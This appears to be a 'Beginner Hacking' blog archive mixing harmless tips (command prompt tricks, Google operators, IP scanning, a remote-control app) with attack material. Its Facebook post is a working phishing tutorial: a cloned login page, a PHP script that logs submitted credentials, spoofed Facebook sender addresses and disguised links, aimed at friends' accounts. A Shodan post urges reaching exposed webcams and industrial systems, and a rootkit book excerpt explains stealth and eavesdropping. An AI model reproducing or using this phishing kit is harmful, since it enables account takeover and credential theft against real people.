Category Archives: (C) Beginner Hacking

Shodan a Search Engine for Hackers

Many people have described Shodan as a search engine for hackers, and have even called it “the world’s most dangerous search engine”. It was developed by John Matherly in 2009, and unlike other search engines, it looks for specific information that can be invaluable to hackers. John Matherly is an Inernet Cartographer, hence the shodan.

Shodan is a type of search engine that allows users to search for Internet-connected devices and explicit website information such as the type of software running on a particular system and local anonymous FTP servers. Shodan can be used much in the same way as Google, but indexes information based on banner content, which is meta-data that servers send back to hosting clients. For the best results, Shodan searches should be executed using a series of filters in a string format.

So in conclusion we can say that, Shodan is a search engine for finding specific devices, and device types, that exist online. It is like an internet map that lets us see which device is connected to which or ports are open on a specific device or what operating system a certain system is using, etc. Rather than to locate specific content on a particular search term, SHODAN is designed to help the user find specific nodes (desktops, servers, routers, switches, etc.) with specific content in their banners.

What Shodan can do?

Shodan pulls service banners from servers and devices on the web, mostly port 80, but also ports 21 (ftp), 22 (SSH), 23 (telnet), 161 (SNMP), and 5060 (SIP). Since almost every new device now has a web interface (maybe even your refrigerator) to ease remote management, we can access innumerable web-enabled servers, network devices, home security systems, etc. Shodan can find us webcams, traffic signals, video projectors, routers, home heating systems, and SCADA systems that, for instance, control nuclear power plants and electrical grids. If it has a web interface, Shodan can find it! Although many of these systems communicate over port 80 using HTTP, many use telnet or other protocols over other ports. Keep that in mind when trying to connect to them.

How to use Shodan?

Understanding shodan is very important at first you might find it complex but once yu get to know it you will find it very handy in use and  very resourcefull too. So, now let us learn how to work with fasinating search engine. To use shodan to your advantage you have

Follow the steps to register. After registration a link will be sent to your e-mail ID for your activation of account on Shodan. Once your account is activated login to Shodan and now that you are logged in you are free to search anything.

Here are some examples for which you can use shodan to search up the things you want.

Webcam

When you search for webcam, it will show you all the webcam present in the world. It will show the results as shown in the image below :

Traffic Signals

Searching about traffic signals or traffic signals camera then it will show you all the traffic surveillance camera present.

Cisco

Searching about cisco will show you all the cisco routers in the world but you can search them by country. Like, here, i have found cisco routers in India and result is below image :

Scada

You can also search about Scada and you will get its information around the whole world as shown :

netcam

Shodan can also show you about all the netcams in world and you can access them too with your hacking skills.

GPS

Shodan even lets you find all the GPS devices all over the world and for this you just have to type gps in the search box.

Port

Not only the devices but it can help find which port is open in which device. For example I have here searched port : 1723. Now we all know this port is used for VPN so through this we can know which device is using VPN as shown in image below :

When you search for port : 3389 it will show the operating system used by the device too which can be very useful.

This is how Shodan is useful for hackers as it gives all the information necessary to collect that too all over the world. And so you can manipulate this information as you desire.

Using Whois From Command Prompt In Windows

Here We Will See How To Use Whois From Command Prompt In Windows

Step1 : Download Whois From Here

Alternate Link : https://technet.microsoft.com/en-us/sysinternals/whois.aspx

Step 2 Go To The Path Where You Extract The Zip Of Whois In Our Case It Is C:\tools\WhoIs

Step 3 : Enter Ip Address Or Website Name Followed By Whois

Example :  “Whois yahoo.com” And Press Enter

For Queries Comment Below

Angry IP Scanner – How to Use and Download

What is Angry IP Scanner?

Angry IP Scanner is a simple fast and effective portable program to scan and manage IP details and configurations. It is a free program and you can easily use and download this program from the sourceforge website.

Supported Operating System

  • Windows XP
  • Windows VISTA
  • Windows 7
  • Windows 8
  • Windows 10
  • Mac OS X
  • Linux
  • UBUNTU

Will work with previous version of Windows but support is very limited.

Is this a virus?

No, it is not a virus. It is simple network program designed for System Admin and Network professionals. Some antivirus might show some warning for this program which is a false positive alarm. Ignore it or add to allow list.

Features :

Some of the brilliant features of Angry IP Scanner program are –
  1. Small and Efficient
  2. Fast port scanner
  3. Reverse look up IP address
  4. Mac  Address Look up
  5. Complete IP range support from 1.0.0.1 to 255.255.255.255
  6. Automatic OS detection
  7. No Adware Malware or Advertisement pop ups.
  8. Additional Network Configuration Tools

How to Use Angry IP Scanner Tutorial

If you are a home user with a single computer you have nothing much to do with this tool apart from scanning your ISP and detecting open ports on the connected network range. Make sure you do not break any of your country law as some countries block the use of IP scans.
Network Admin will love this tool for what it is capable of achieving in a few seconds (depending upon the IP block range you are exploring). These are some of the important things which can help you out with your Network management –

Scan for Open ports

  1. Specify the IP range of your network
  2. Enter Hostname
  3. Select Netmask from the drop down
  4. Press the start button
  5. Wait till complete scan is completed
Now the ones in Red are dead connections and the blue dots are live systems. By default you will shown the Ping time, hostname and Ports associated with the particular IP address.

Look up Mac Address

  1. Follow the same steps as mentioned above
  2. Right click any IP you want to know Mac address
  3. Select Show details
  4. You will now be shown Mac address and other details
  5. Select IP address you want to check for open ports
  6. Right click it and select scan all ports
  7. Get the complete list in a few seconds

Search for All open ports

There are many additional tasks that you can do with this open source program. You can join the Discussion here.

Download Angry IP Scanner

You use the following links to download this program to your computer –
If you are facing any problem using this program you can ask for help in the comment section. Use this program responsibly.

15 Useful Command Prompt Tricks You Might Not Know

1. Get help on almost every Command

command-prompt-tricks (1)

This is especially helpful for beginners, but advanced users may get to learn few things too. You can easily get info on almost every command you provide in the Command Prompt. Information includes complete details of what a command does and what process are used, it may also show some examples.

To get the help, just type “/?” at the end of the command of which you need info. For example, you can type “ipconfig/?”, and you will get all the info.

2. Use Function Keys

You can use function keys (F1, F2, F3, etc.) right inside command prompt and get different results. Below are the uses of functions keys in Command Prompt:

  • F1: Pastes per character last used command
  • F2: Pastes last used command only to a specified command character
  • F3: Pastes Last used command
  • F4: Delete command only to a specified command character
  • F5: Pastes last used command without cycling
  • F6: Pastes ^Z
  • F7: Provides a list of already used commands (selectable)
  • F:8 Pastes cycleable used commands
  • F9: Will let you paste command from the list of recently used commands

3. Save a Command to a File

command-prompt-tricks (2)

If you want to save results of a command to a .txt for future reference, then it is quite easy as well. All you need to do is add “> (destination/file name with .txt extension)” at the end of the command you are about to execute.

For example, you can type “ipconfig > c:\Networkdetails.txt”, this command will create a .txt file in C drive with name “Networkdetails”.

4. Copy Data from the Command Prompt

command-prompt-tricks (3)

Copying data from the Command Prompt isn’t just a Ctrl+C away, the process is actually different. It is not that hard, just right click anywhere in the window and click on “Mark” from the menu. After that, just select the text you want to copy and hit Enter to copy it.

Important Note: With Windows 10, Ctrl+C and Ctrl+V commands to copy/paste has been enabled in Command Prompt. So you don’t need to follow the above process, if you are using Windows 10. Also, In Windows 10 keyboard shortcuts for CMD are enabled by default which wasn’t the case with earlier version of Windows.

5. Cycle Through Folders

Specifying exact directories can be a bit frustrating task if you don’t have the destination copied. However, if you just know in which drive or folder the required folder is located, then you can cycle through all the folders to reach it. To do this, just type specified drive and start press TAB key on your keyboard to cycle through all the folders inside it.

6. Use QuickEdit Mode

command-prompt-tricks (4)

Command Prompt comes with QuickEdit Mode to quickly copy and paste content with just your right-click. In QuickEdit mode, you can highlight content and right-click to copy it or right-click in a blank area to paste content from the clipboard (if there is any).

To enable QuickEdit Mode, right-click on the top of the Command Prompt interface (where exit button is located) and select “Properties”. In the properties, check the checkbox next to “QuickEdit Mode” to enable it (you will have to disable it later).

7. Check IP address of any Website

command-prompt-tricks (5)

You can see IP address of any website just by entering “nslookup” command along with the name of the website. For example, you can type “nslookup beebom.com” to find its IP address.

8. Execute Multiple Commands

command-prompt-tricks (6)

You can easily execute one command after another by provide all the commands and putting “&&” between each command (may save some time). For example, you can type “ipconfig && dir” to execute both commands one after another.

9. Check Default Programs

command-prompt-tricks (7)

You can check which applications are used to open specific types of programs. For this purpose, just type “assoc” in the Command Prompt and hit enter. You will see all the extensions and their associated program that opens them written next to them.

10. Get PC Drivers List

command-prompt-tricks (8)

You can open list of all the drivers installed on your PC with just a single command. Just type “driverquery” in the Command Prompt and press Enter. After a short delay, you will see all the drivers installed in your PC along with, Name, Type and Link date.

11. Scan System Files

command-prompt-tricks (9)

The system files can also be scanned and repaired from the Command Prompt. Type “sfc/scannow” and press enter, the scan will start and may take quite some time depending on your PC speed (up to an hour may be). It will either automatically repair the files or let you know if there is a problem and provide its details.

12. Change Command Prompt Color

command-prompt-tricks (10)

You can also change command prompt color to make it look less dull and a bit easy on the eyes. To do so, right-click at the top corners of Command Prompt and select “Properties” from the menu. In the properties, navigate to “Colors” tab and you will find all the options to change color of both text and background.

13. Create Undelete-able Folders

command-prompt-tricks (11)

You can create undeletable folders using specific set of keywords. In the Command Prompt, type the name of the drive where you want to create the folder (it must not have Windows installed in it). After that, type any of these keywords “md con\” or “md lpt1\” and press Enter. So it should look something like this “D: md con\”.

This will create a folder with the same name that could not be deleted or renamed. To delete the folder replace “md con\” with “rd con\” or “md lpt1\” with “rd lpt1\”.

14. Get Network Details

command-prompt-tricks (12)

You can get quick network details, like IP address and subnet mask or Default Gateway with a single command. Type “ipconfig” and press Enter, you will see all the details of your network.

15. Hide Files and Folders using Command Prompt

command-prompt-tricks (13)

You can hide folder with the help of Command Prompt that cannot be accessed using the traditional hide feature of Windows. To do this, type the drive name where the folder is located and then enter this command “Attrib +h +s +r” and afterwards, enter the name of the file/folder you want to hide. So it should look something like this “D: Attrib +h +s +r haider”.

If the folder is inside another folder, then the command must come before the folder/file you want to hide not just after the Drive name. To again see the folder, use the same process above but change the command to “Attrib -h -s -r” from “Attrib +h +s +r”.

Know when someone opens your email and get reminders to follow up

Find out when, how many times, and which recipeient has opened your message. Also, get the option to auto-create followup reminders for them.

gmail auto followup

Install the Chrome extension FollowUp and sign in using whatever method you prefer. You will also need to grant the app permission to manage your Gmail. Once it’s installed, you will see new options in your Gmail compose window including the option to track that email, send it later, and more.

Learn Best Search Engine Hacks Of All Time

1. Search Exact Phrases – If you’re looking for an exact phrase, use quotation marks around the keywords to view results containing that exact phrase.

google-search-specific-phrase

2. Exclude a word – If your search terms contain a keyword with several meanings, you can exclude one of the meanings by adding a hyphen (-) before the keyword.

google-search-exclude

3. Search a specific domain – You can search within a particular URL by including the operator site:example.com before or after your keywords.

google-search-domain

4. Generate similar content – To generate content similar to those found on a URL you already know, use the related: operator before adding the URL.

google-search-related

5. Search for words in text – To retrieve pages where all the keywords appear in the body of the page, use the allintext: operator before the search terms.

google-search-allintext

6. Search for words in title – Similar to number 5, you can retrieve pages whose titles contain the keywords you’re searching for by using the allintitle: operator.

google-search-allintitle

7. Search for multiple phrases – You can enter more than one query into Google at a time to view pages with one of the specified keywords. Just use a capitalised “OR” to separate the terms.

google-search-OR

8. Find news by location – To look for news items emerging from a particular location, use the location: operator, then add the city name.

google-search-location

9. Search by file type – If you’re looking for a specific file on the Web, you can use the filetype: operator to specify the particular document type you’re searching for, and Google will restrict results to pages containing those document types.

google-search-filetype

10. Forgotten words – An asterisk acts as a wildcard to help you find the missing word in a phrase. You can also get suggestions by using Google’s auto-completion feature. Just type out the full phrase, then delete the word you want to replace.

google-search-autocomplete

11. Find a page that links to another url – Using the link: operator, you can find pages that link to another url. This is probably more useful for SEOs who are searching for backlinks to a specific page.

google-search-link

12. Perform calculations on Google Search – You can simply type in the equation and get the result instantly.

google-search-calculate

13. Find exact sunrise and sunset times in any location

google-search-sunrise

14. Find exact scores of sport games simply by entering the team name or competition.

google-search-sports

15. Use Google to determine the local time of any city.

google-search-time

16. Find your public IP address.

google-search-ipaddress

17. You don’t need a dictionary; just ask Google.

google-search-dictionary

18. Search for books by your favourite author.

google-search-books

19. And music from your favourite artist.

google-search-music

20. You can view flight schedules on Google.

google-search-flight-schedule

21. Google can convert between units.

google-search-conversion

22. And translate from one language to another.

google-search-translate

23. Use Google as a countdown timer.

google-search-timer

24. Track your packages by entering any UPS, USPS or FedEx tracking number directly into Google to see tracking information about your package.

25. Use Google to view the weather forecast for different cities.

google-search-weather

Use these hacks you can improve your productivity by searching Google more efficiently and locate the information you’re looking for faster without having to click through multiple pages. Let us know your thoughts in the comments section below.

How to Hack Facebook Account Using Phising webPage

Everyone eager to hack the facebook account of others.  Here is the simplest method using phishing webpage ,you can hack the facebook account of your friends .

Phishing WebPage:
Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select “View Page source”.
Copy the code to Notepad.

Step2:
Now find (Press ctrl +f)  for “action=”  in that code.
You fill find the code like this:

The big red ring that circles the action= you have to change. You have to change it to ‘action=”next.php” ‘. after you have done that, you should change the method (small red circle on the picture) to “get” instead of “post”, or else it will not work. Save the document as index.html

Step 3:
Now we need to create the “next.php” to store the password.  so open the notepad and type the following code:

<?php
header(“Location: http://www.Facebook.com/login.php “);
$handle = fopen(“pswrds.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

save this file as “next.php”

Update: I have updated the php script. Now it is working …! Rectified all the problem and errors.

Step 4:
open the notepad and just save the file as “pswrds.txt” without any contents.

Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com.
use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.

Step 5:
 create an mail account with facebook keyword like : FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com

Step 6 :

Copy the original Facebook friendship invitation and paste in your mail.
remove the hyperlink from this  http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button
*Updated* 
everyone asking doubts about this 6th step.   You may get Facebook friendship invitation from Facebook when someone “add as a friend”, right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.

Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page..

Note:
For user to believe change Your phishing web page url with any of free short url sites.
Like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.

How you can use your Smartphone as a keyboard, mouse and a remote control for your PC

Controlling a PC with a mouse and a keyboard is common, that’s what everybody does but there is an other cool way of interacting with PC. You can use your smartphone as a controller and control your PC.

You can use your smartphone as a PC controller using a smartphone app and PC app combo called Unified Remote.

The app you install in your phone talks to the server app you installed in your PC. The mobile app sends

mouse, keyboard, and other remote control-type input to the server app.

 The features offered by Youtube and VLC media player to stream media on to PC and control it from your smartphone is good. But these features are limited with only a set of things you can do. The best way to deal with this problem is to use your smartphone as a mouse and keyboard.

The app we mentioned above, Unified Remote works very well for this. The standard version is free, with a paid version offering additional specialized remote functions. The free version will let you use your phone as a mouse, keyboard, and give you access to other media remote functions. You can install the app on an iPhone, Android phone, or even a Windows Phone. You can use it to control a Windows, Mac, or Linux PC. So whatever devices you have, Unified Remote should work for you. It can communicate with your computer using Wi-Fi or Bluetooth.

Installations in PC side

From the official website, the Unified Remote website download Unified Remote for  Windows, Mac, or Linux.  After finishing your downloading process, it and go through the installation process. On Windows, this installs an input driver that allows Unified Remote to control your computer.

UnifiedController-installing

After completing the above step, installer should automatically launch Unified Remote.

The process is same in Linux and Mac OS X.

Installing in Mobile side

Now you have to install the Unified Remote app for Android, iPhone, or Windows Phone. After launching the app on your phone, tap the “I have installed the server” button. The app will scan your local network to find a computer running the server, so be sure your phone is on the same Wi-Fi network as your computer.

UnifiedController-installing02

Now you can use your smartphone as a mouse and you will find it comfortable than sitting in a sofa consuming media and struggling to control cursor using mouse on awkward positions.

Other common trackpad actions like a single tap to click and a two-finger drag to scroll up and down will also work. From the Basic Input screen, you can tap the keyboard icon at the bottom-left corner of the screen to pull up your smartphone keyboard. Type on the keyboard and it’ll send that input to your computer.

UnifiedController-installing03

Now that you have Unified Remote installed, explore it and find new inputs you can give using your smartphone.

The Basics of Rootkits

What Is a Rootkit?

The term rootkit has been around for more than 10 years. A rootkit is a “kit” consisting of small and useful programs that allow an attacker to maintain access to “root,” the most powerful user on a computer. In other words, a rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer.

In our definition of “rootkit,” the key word is “undetectable.” Most of the technology and tricks employed by a rootkit are designed to hide code and data on a system. For example, many rootkits can hide files and directories. Other features in a rootkit are usually for remote access and eavesdropping—for instance, for sniffing packets from the network. When combined, these features deliver a knockout punch to security.

Rootkits are not inherently “bad,” and they are not always used by the “bad guys.” It is important to understand that a rootkit is just a technology. Good or bad intent derives from the humans who use them. There are plenty of legitimate commercial programs that provide remote administration and even eavesdropping features. Some of these programs even use stealth. In many ways, these programs could be called rootkits. Law enforcement may use the term “rootkit” to refer to a sanctioned back-door program—something installed on a target with legal permission from the state, perhaps via court order. (We cover such uses in the section Legitimate Uses of Rootkits later in this chapter.) Large corporations also use rootkit technology to monitor and enforce their computer-use regulations.

By taking the attacker’s perspective, we guide you through your enemies’ skills and techniques. This will increase your skills in defending against the rootkit threat. If you are a legitimate developer of rootkit technology, this book will help you build a base of skills that you can expand upon.

Why Do Rootkits Exist?

Rootkits are a relatively recent invention, but spies are as old as war. Rootkits exist for the same reasons that audio bugs exist. People want to see or control what other people are doing. With the huge and growing reliance on data processing, computers are natural targets.

Rootkits are useful only if you want to maintain access to a system. If all you want to do is steal something and leave, there is no reason to leave a rootkit behind. In fact, leaving a rootkit behind always opens you to the risk of detection. If you steal something and clean up the system, you may leave no trace of your operation.

Rootkits provide two primary functions: remote command and control, and software eavesdropping.

Remote Command and Control

Remote command and control (or simply “remote control”) can include control over files, causing reboots or “Blue Screens of Death,” and accessing the command shell (that is, cmd.exe or /bin/sh). Figure 1-1 shows an example of a rootkit command menu. This command menu will give you an idea of the kinds of features a rootkit might include.

Example 1-1. Menu for a kernel rootkit.

Win2K Rootkit by the team rootkit.com
Version 0.4 alpha
-----------------------------------------
command       description
ps            show process list
help          this data
buffertest    debug output
hidedir       hide prefixed file or directory
hideproc      hide prefixed processes
debugint      (BSOD)fire int3
sniffkeys     toggle keyboard sniffer
echo <string> echo the given string
*"(BSOD)" means Blue Screen of Death
  if a kernel debugger is not present!
*"prefixed" means the process or filename
  starts with the letters '_root_'.
*"sniffer" means listening or monitoring software. 

Software Eavesdropping

Software eavesdropping is all about watching what people do. This means sniffing packets, intercepting keystrokes, and reading e-mail. An attacker can use these techniques to capture passwords and decrypted files, or even cryptographic keys.

Legitimate Uses of Rootkits

As we alluded to already, rootkits can be used for legitimate purposes. For instance, they can be used by law-enforcement agencies to collect evidence, in an advanced bugging operation. This would apply to any crime in which a computer is used, such as computer trespass, creating or distributing child pornography, software or music piracy, and DMCA [10] violations.

Rootkits can also be used to fight wars. Nations and their militaries rely heavily on computing machinery. If these computers fail, the enemy’s decision cycle and operations can be affected. The benefits of using a computer (versus conventional) attack include that it costs less, it keeps soldiers out of danger, it causes little collateral damage, and in most cases it does not cause permanent damage. For instance, if a nation bombs all the power plants in a country, then those power plants will need to be rebuilt at great expense. But if a software worm infects the power control network and disables it, the target country still loses use of the power plants’ output, but the damage is neither permanent nor as expensive.

How Long Have Rootkits Been Around?

As we noted previously, rootkits are not a new concept. In fact, many of the methods used in modern rootkits are the same methods used in viruses in the 1980s—for example, modifying key system tables, memory, and program logic. In the late 1980s, a virus might have used these techniques to hide from a virus scanner. The viruses during this era used floppy disks and BBS’s (bulletin board systems) to spread infected programs.

When Microsoft introduced Windows NT, the memory model was changed so that normal user programs could no longer modify key system tables. A lapse in hard virus technology followed, because no virus authors were using the new Windows kernel.

When the Internet began to catch on, it was dominated by UNIX operating systems. Most computers used variants of UNIX, and viruses were uncommon. However, this is also when network worms were born. With the famous Morris Worm, the computing world woke up to the possibility of software exploits. [11] During the early 1990s, many hackers figured out how to find and exploit buffer overflows, the “nuclear bomb” of all exploits. However, the virus-writing community didn’t catch on for almost a decade.

During the early 1990s, a hacker would penetrate a system, set up camp, and then use the freshly compromised computer to launch new attacks. Once a hacker had penetrated a computer, she needed to maintain access. Thus, the first rootkits were born. These original rootkits were merely backdoor programs, and they used very little stealth. In some cases, they replaced key system binaries with modified versions that would hide files and processes. For example, consider a program called ls that lists files and directories. A first-generation rootkit might replace the ls program with a Trojan version that hides any file named hacker_stuff. Then, the hacker would simply store all of her suspect data in a file named hacker_stuff. The modified ls program would keep the data from being revealed.

System administrators at that time responded by writing programs such as Tripwire [12] that could detect whether files had been changed. Using our previous example, a security utility like Tripwire could examine the ls program and determine that it had been altered, and the Trojan would be unmasked.

The natural response was for attackers to move into the kernel of the computer. The first kernel rootkits were written for UNIX machines. Once they infected the kernel, they could subvert any security utility on the computer at that time. In other words, Trojan files were no longer needed: All stealth could be applied by modifying the kernel. This technique was no different from the techniques used by viruses in the late 1980s to hide from anti-virus software.

How Do Rootkits Work?

Rootkits work using a simple concept called modification. In general, software is designed to make specific decisions based on very specific data. A rootkit locates and modifies the software so it makes incorrect decisions.

There are many places where modifications can be made in software. Some of them are discussed in the following paragraphs.

Patching

Executable code (sometimes called a binary) consists of a series of statements encoded as data bytes. These bytes come in a very specific order, and each means something to the computer. Software logic can be modified if these bytes are modified. This technique is sometimes called patching—like placing a patch of a different color on a quilt. Software is not smart; it does only and exactly what it is told to do and nothing else. That is why modification works so well. In fact, under the hood, it’s not all that complicated. Byte patching is one of the major techniques used by “crackers” to remove software protections. Other types of byte patches have been used to cheat on video games (for example, to give unlimited gold, health, or other advantages).

Easter Eggs

Software logic modifications may be “built in.” A programmer may place a back door in a program she wrote. This back door is not in the documented design, so the software has a hidden feature. This is sometimes called an Easter Egg, and can be used like a signature: The programmer leaves something behind to show that she wrote the program. Earlier versions of the widely used program Microsoft Excel contained an easter-egg that allowed a user who found it to play a 3D first-person shooter game similar to Doom [13] embedded inside a spreadsheet cell.

Spyware Modifications

Sometimes a program will modify another program to infect it with “spyware.” Some types of spyware track which Web sites are visited by users of the infected computer. Like rootkits, spyware may be difficult to detect. Some types of spyware hook into Web browsers or program shells, making them difficult to remove. They then make the user’s life hell by placing links for new mortgages and Viagra on their desktops, and generally reminding them that their browsers are totally insecure. [14]

Source-Code Modification

Sometimes software is modified at the source—literally. A programmer can insert malicious lines of source code into a program she authors. This threat has caused some military applications to avoid open-source packages such as Linux. These open-source projects allow almost anyone (“anyone” being “someone you don’t know”) to add code to the sources. Granted, there is some amount of peer review on important code like BIND, Apache, and Sendmail. But, on the other hand, does anyone really go through the code line by line? (If they do, they don’t seem to do it very well when trying to find security holes!) Imagine a back door that is implemented as a bug in the software. For example, a malicious programmer may expose a program to a buffer overflow on purpose. This type of back door can be placed on purpose. Since it’s disguised as a bug, it becomes difficult to detect. Furthermore, it offers plausible deniability on the part of the programmer!

Okay, we can hear you saying “Bah! I fully trust all those unknown people out there who authored my software because they are obviously only three degrees of separation from Linus Torvalds [15] and I’d trust Linus with my life!” Fine, but do you trust the skills of the system administrators who run the source-control servers and the source-code distribution sites? There are several examples of attackers gaining access to source code. A major example of this type of compromise took place when the root FTP servers for the GNU Project (gnu.org), source of the Linux-based GNU operating system, were compromised in 2003. [16] Modifications to source code can end up in hundreds of program distributions and are extremely difficult to locate. Even the sources of the very tools used by security professionals have been hacked in this way. [17]

The Legality of Software Modification

Some forms of software modification are illegal. For example, if you use a program to modify another program in a way that removes copyright mechanisms, you may be in violation of the law (depending on your jurisdiction). This applies to any “cracking” software that can commonly be found on the Internet. For example, you can download an evaluation copy of a program that “times out” and stops functioning after 15 days, then download and apply a “crack,” after which the software will run as if it had been registered. Such a direct modification of the code and logic of a program would be illegal.

What a Rootkit Is Not

Okay, so we’ve described in detail what a rootkit is and touched on the underlying technology that makes a rootkit possible. We have described how a rootkit is a powerful hacker tool. But, there are many kinds of hacker tools—a rootkit is only one part of a larger collection. Now it’s time to explain what a rootkit is not.

A Rootkit Is Not an Exploit

Rootkits may be used in conjunction with an exploit, but the rootkit itself is a fairly straightforward set of utility programs. These programs may use undocumented functions and methods, but they typically do not depend on software bugs (such as buffer overflows).

A rootkit will typically be deployed after a successful software exploit. Many hackers have a treasure chest of exploits available, but they may have only one or two rootkit programs. Regardless of which exploit an attacker uses, once she is on the system, she deploys the appropriate rootkit.

Although a rootkit is not an exploit, it may incorporate a software exploit. A rootkit usually requires access to the kernel and contains one or more programs that start when the system is booted. There are only a limited number of ways to get code into the kernel (for example, as a device driver). Many of these methods can be detected forensically.

One novel way to install a rootkit is to use a software exploit. Many software exploits allow arbitrary code or third-party programs to be installed. Imagine that there is a buffer overflow in the kernel (there are documented bugs of this nature) that allows arbitrary code to be executed. Kernel-buffer overflows can exist in almost any device driver (for example, a printer driver). Upon system startup, a loader program can use the buffer overflow to load a rootkit. The loader program does not employ any documented methods for loading or registering a device driver or otherwise installing a rootkit. Instead, the loader exploits the buffer overflow to install the kernel-mode parts of a rootkit.

The buffer-overflow exploit is a mechanism for loading code into the kernel. Although most people think of this as a bug, a rootkit developer may treat it as an undocumented feature for loading code into the kernel. Because it is not documented, this “path to the kernel” is not likely to be included as part of a forensic investigation. Even more importantly, it won’t be protected by a host-based firewall program. Only someone skilled in advanced reverse engineering would be likely to discover it.

A Rootkit Is Not a Virus

A virus program is a self-propagating automaton. In contrast, a rootkit does not make copies of itself, and it does not have a mind of its own. A rootkit is under the full control of a human attacker, while a virus is not.

In most cases, it would be dangerous and foolish for an attacker to use a virus when she requires stealth and subversion. Beyond the fact that creating and distributing virus programs may be illegal, most virus and worm programs are noisy and out of control. A rootkit enables an attacker to stay in complete control. In the case of a sanctioned penetration (for example, by law enforcement), the attacker needs to ensure that only certain targets are penetrated, or else she may violate a law or exceed the scope of the operation. This kind of operation requires very strict controls, and using a virus would simply be out of the question.

It is possible to design a virus or worm program that spreads via software exploits that are not detected by intrusion-detection systems (for instance, zero-day exploits [18] ). Such a worm could spread very slowly and be very difficult to detect. It may have been tested in a well-stocked lab environment with a model of the target environment. It may include an “area-of-effect” restriction to keep it from spreading outside of a controlled boundary. And, finally, it may have a “land-mine timer” that causes it to be disabled after a certain amount of time—ensuring that it doesn’t cause problems after the mission is over. We’ll discuss intrusion-detection systems later in this chapter.

The Virus Problem

Even though a rootkit is not a virus, the techniques used by a rootkit can easily be employed by a virus. When a rootkit is combined with a virus, a very dangerous technology is born.

The world has seen what viruses can do. Some virus programs have spread through millions of computers in only a few hours.

The most common operating system, Microsoft Windows, has historically been plagued with software bugs that allow viruses to infect computers over the Internet. Most malicious hackers will not reveal software bugs to the vendor. In other words, if a malicious hacker were to find an exploitable bug in Microsoft Windows, she would not reveal this to Microsoft. An exploitable bug that affects the default installation of most Windows computers is like a “key to the kingdom”; telling the vendor about it would be giving away the key.

Understanding rootkit technology is very important for defending against viruses. Virus programmers have been using rootkit technology for many years to “heat up” their viruses. This is a dangerous trend. Algorithms have been published for virus propagation [19] that can penetrate hundreds of thousands of machines in an hour. Techniques exist for destroying computer systems and hardware. And, remotely exploitable holes in Microsoft Windows are not going away. Viruses that use rootkit technology are going to be harder to detect and prevent.

Rootkits and Software Exploits

Software exploitation is an important subject relating to rootkits. (How software can break and be exploited is not covered in this book. If you’re interested in software exploitation, we recommend the book Exploiting Software. [20] )

Although a rootkit is not an exploit, it may be employed as part of an exploit tool (for example, in a virus or spyware).

The threat of rootkits is made strong by the fact that software exploits are in great supply. For example, a reasonable conjecture is that at any given time, there are more than a hundred known working exploitable holes in the latest version of Microsoft Windows. [21] For the most part, these exploitable holes are known by Microsoft and are being slowly managed through a quality-assurance and bug-tracking system. [22] Eventually, these bugs are fixed and silently patched. [23]

Some exploitable software bugs are found by independent researchers and never reported to the software vendor. They are deadly because nobody knows about them accept the attacker. This means there is little to no defense against them (no patch is available).

Many exploits that have been publicly known for more than a year are still being widely exploited today. Even if there is a patch available, most system administrators don’t apply the patches in a timely fashion. This is especially dangerous since even if no exploit program exists when a security flaw is discovered, an exploit program is typically published within a few days after release of a public advisory or a software patch.

Although Microsoft takes software bugs seriously, integrating changes by any large operating system vendor can take an inordinate amount of time.

When a researcher reports a new bug to Microsoft, she is usually asked not to release public information about the exploit until a patch can be released. Bug fixing is expensive and takes a great deal of time. Some bugs aren’t fixed until several months after they are reported.

One could argue that keeping bugs secret encourages Microsoft to take too long to release security fixes. As long as the public doesn’t know about a bug, there is little incentive to quickly release a patch. To address this tendency, the security company eEye has devised a clever method to make public the fact that a serious vulnerability has been found, but without releasing the details.

Figure 1-2, which comes from eEye’s Web site, [24] shows a typical advisory. It details when the bug was reported to a vendor, and by how many days the vendor patch is “overdue,” based on the judgment that a timely response would be release of a patch within 60 days. As we have seen in the real world, large software vendors take longer than 60 days. Historically, it seems the only time a patch is released within days is when a real Internet worm is released that uses the exploit.

Figure 1-2 Method used by eEye to “pre-release” a security advisory.